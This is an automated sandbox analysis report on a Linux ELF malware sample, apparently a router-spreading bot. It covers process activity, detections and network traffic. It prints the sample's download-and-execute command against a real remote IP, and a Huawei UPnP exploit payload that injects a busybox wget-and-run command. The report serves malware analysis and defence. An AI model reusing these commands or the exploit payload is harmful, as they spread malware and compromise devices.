Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
5.elf

Overview

General Information

Sample name:5.elf
Analysis ID:1588850
MD5:40d57a51ffba8151bf851940d0ad367e
SHA1:dd2bbf98840d5cfe68e6cdc660c6c25e4de6dbc9
SHA256:c14f6f5a9f774456aef2319034d9e6b57975164e2bdbf9a4bf178737a3e725c3
Tags:elfuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "wget" command typically used for HTTP/S downloading
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1588850
Start date and time:2025-01-11 06:17:17 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:5.elf
Detection:MAL
Classification:mal56.spre.evad.linELF@0/3@2/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: 5.elf
Command:/tmp/5.elf
PID:5423
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • 5.elf (PID: 5423, Parent: 5347, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/5.elf
    • 5.elf New Fork (PID: 5436, Parent: 5423)
    • sh (PID: 5436, Parent: 5423, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 5438, Parent: 5436)
      • systemctl (PID: 5438, Parent: 5436, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • 5.elf New Fork (PID: 5442, Parent: 5423)
    • sh (PID: 5442, Parent: 5423, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service > /dev/null 2>&1"
      • sh New Fork (PID: 5444, Parent: 5442)
      • systemctl (PID: 5444, Parent: 5442, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
  • wrapper-2.0 (PID: 5427, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5428, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 5429, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 5430, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 5431, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5432, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 5440, Parent: 5439)
  • snapd-env-generator (PID: 5440, Parent: 5439, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5445, Parent: 1)
  • bash (PID: 5445, Parent: 1, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;"
    • bash New Fork (PID: 5453, Parent: 5445)
    • sleep (PID: 5453, Parent: 5445, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 10
    • bash New Fork (PID: 5464, Parent: 5445)
    • rm (PID: 5464, Parent: 5445, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/5
    • bash New Fork (PID: 5465, Parent: 5445)
    • wget (PID: 5465, Parent: 5445, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://103.136.41.100/5 -O /tmp/5
    • bash New Fork (PID: 5467, Parent: 5445)
    • chmod (PID: 5467, Parent: 5445, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 /tmp/5
    • bash New Fork (PID: 5468, Parent: 5445)
    • 5 (PID: 5468, Parent: 5445, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/5 .p1
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 5.elfReversingLabs: Detection: 39%
Source: global trafficTCP traffic: 192.168.2.13:56441 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.13:34549 -> 1.1.1.1:53
Source: /bin/bash (PID: 5465)Wget executable: /usr/bin/wget -> wget http://103.136.41.100/5 -O /tmp/5Jump to behavior
Source: /tmp/5.elf (PID: 5423)Socket: 127.0.0.1:23476Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 103.136.41.100Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: 5.42.drString found in binary or memory: http://%d.%d.%d.%d/%s
Source: 5.elf, 5.42.drString found in binary or memory: http://%d.%d.%d.%d/2;
Source: 5.elf, 5423.1.00007fa550036000.00007fa55003a000.rw-.sdmp, bash, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp, 5, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: hello.service.12.drString found in binary or memory: http://103.136.41.100/5
Source: 5.elf, 5423.1.00007fa550036000.00007fa55003a000.rw-.sdmp, bash, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp, 5, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: 5.42.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 5.42.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

barindex
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3104, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3161, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3162, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3163, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3164, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3165, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3170, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3182, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3212, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5427, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5428, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5429, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5430, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5431, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5432, result: successfulJump to behavior
Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sampleString containing 'busybox' found: %s%d%s<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3104, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3161, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3162, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3163, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3164, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3165, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3170, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3182, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 3212, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5427, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5428, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5429, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5430, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5431, result: successfulJump to behavior
Source: /tmp/5.elf (PID: 5423)SIGKILL sent: pid: 5432, result: successfulJump to behavior
Source: classification engineClassification label: mal56.spre.evad.linELF@0/3@2/0
Source: /tmp/5.elf (PID: 5423)File opened: /proc/5262/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/5262/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/5262/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/5262/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/5262/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3122/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3117/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3114/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3375/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3132/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1866/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1745/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/884/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1982/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/765/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/3246/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/767/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/5423/statusJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5423)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/5.elf (PID: 5436)Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/5.elf (PID: 5442)Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"Jump to behavior
Source: /usr/lib/systemd/systemd (PID: 5445)Shell command executed: /bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;"Jump to behavior
Source: /bin/bash (PID: 5467)Chmod executable: /usr/bin/chmod -> chmod 777 /tmp/5Jump to behavior
Source: /bin/bash (PID: 5464)Rm executable: /usr/bin/rm -> rm -rf /tmp/5Jump to behavior
Source: /bin/sh (PID: 5438)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5444)Systemctl executable: /usr/bin/systemctl -> systemctl start hello.serviceJump to behavior
Source: /bin/bash (PID: 5465)Wget executable: /usr/bin/wget -> wget http://103.136.41.100/5 -O /tmp/5Jump to behavior
Source: /usr/bin/chmod (PID: 5467)File: /tmp/5 (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
Source: /bin/bash (PID: 5467)Chmod executable with 777: /usr/bin/chmod -> chmod 777 /tmp/5Jump to behavior
Source: /usr/bin/wget (PID: 5465)File written: /tmp/5Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /usr/bin/rm (PID: 5464)File: /tmp/5Jump to behavior